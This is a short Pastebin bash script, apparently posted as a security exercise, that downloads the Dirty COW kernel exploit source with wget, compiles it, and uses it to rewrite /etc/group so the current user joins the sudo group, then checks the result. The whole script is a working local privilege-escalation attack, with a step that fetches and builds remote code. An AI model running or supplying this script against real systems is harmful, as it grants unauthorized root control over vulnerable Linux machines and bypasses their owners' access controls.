Advertisement
Guest User

rimi2171_bash_for_Security

a guest
Dec 15th, 2019
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.23 KB | None | 0 0
  1. #!/bin/bash
  2. wget "https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c"
  3. gcc -pthread dirtyc0w.c -o dirtyc0w
  4. ./dirtyc0w /etc/group "$(sed '/\(sudo*\)/ s/$/,$whoami/' /etc/group)"
  5. cat /etc/group | grep sudo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement